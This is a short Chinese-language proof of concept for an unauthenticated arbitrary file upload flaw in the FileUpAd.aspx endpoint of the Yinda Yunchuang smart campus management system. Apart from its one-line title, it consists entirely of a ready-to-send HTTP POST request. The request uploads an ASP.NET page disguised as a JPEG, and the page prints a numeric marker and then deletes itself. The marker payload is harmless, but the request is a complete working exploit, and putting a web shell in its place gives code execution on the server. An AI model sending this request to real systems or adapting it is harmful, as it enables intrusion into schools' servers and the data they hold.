银达云创 智慧校园管理系统 FileUpAd.aspx 未授权 任意文件上传漏洞

POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=bdkx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 261
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycqjvycfx
Cookie: ASP.NET_SessionId=vzlx4yv4akq1pzpzzkeumwqg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

------WebKitFormBoundarycqjvycfx
Content-Disposition: form-data; name="File1"; filename="bdkx.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%>
<%Response.Write(40350*43697);System.IO.File.Delete(Request.PhysicalPath);%>
------WebKitFormBoundarycqjvycfx--